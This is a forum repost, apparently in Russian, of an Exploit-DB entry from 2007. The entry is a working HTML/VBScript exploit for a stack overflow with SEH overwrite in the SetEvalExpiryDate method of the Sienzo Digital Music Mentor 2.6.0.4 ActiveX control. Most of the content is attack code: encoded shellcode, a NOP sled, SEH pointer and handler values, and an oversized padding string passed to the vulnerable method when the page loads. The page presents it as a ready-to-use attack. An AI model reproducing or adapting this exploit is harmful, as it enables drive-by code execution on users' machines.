Exploit Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate Overwrite (SEH)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3880
Проверка EDB
  1. Пройдено
Автор
PARVEEN VASHISHTHA
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2007-05-09
HTML:
<!--

  ===============================================================================================
  Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) SetEvalExpiryDate Method Stack Overflow SEH Overwrite Exploit
                                                By Parveen Vashishtha
  ==============================================================================================   
        
  Date : 07-05-2007
 
   Open Calc
 
  
  PS. This was written for educational purpose. Use it at your own risk.Author will be not be
      responsible for any damage.
 
  Thanks to Metasploit and Stroke 

-->


<html>

<body>

<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:E2B7DDA9-38C5-11D5-91F6-00104BDB8FF9" > </OBJECT>

<script language="vbscript">




shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")


nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")                    

pointer_to_seh=unescape("%eb%06%90%90")

seh_handler=unescape("%a9%11%02%75")


targetFile = "C:\Program Files\Sienzo\DMM\DSKernel2.dll"
prototype  = "Sub SetEvalExpiryDate ( ByVal Key As String ,  ByVal lCategory As Long ,  ByVal lModuleID As Long ,  ByVal lYear As Long ,  ByVal lMonth As Long ,  ByVal lDay As Long ,  ByVal vbReset As Boolean )"
memberName = "SetEvalExpiryDate"
progid     = "LMDSKernelLib2.LMDSKernel2"
argCount   = 7

arg1=String(1476, "A")
arg2=1
arg3=1
arg4=1
arg5=1
arg6=1
arg7=True

arg1=arg1+pointer_to_seh+seh_handler+nop+shellcode+nop


target.SetEvalExpiryDate arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 

</script>
</body>
</html>

# milw0rm.com [2007-05-09]
 
Источник
www.exploit-db.com

Похожие темы